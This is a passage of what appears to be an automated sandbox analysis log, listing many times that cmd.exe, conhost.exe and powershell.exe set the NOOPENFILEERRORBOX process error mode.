        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
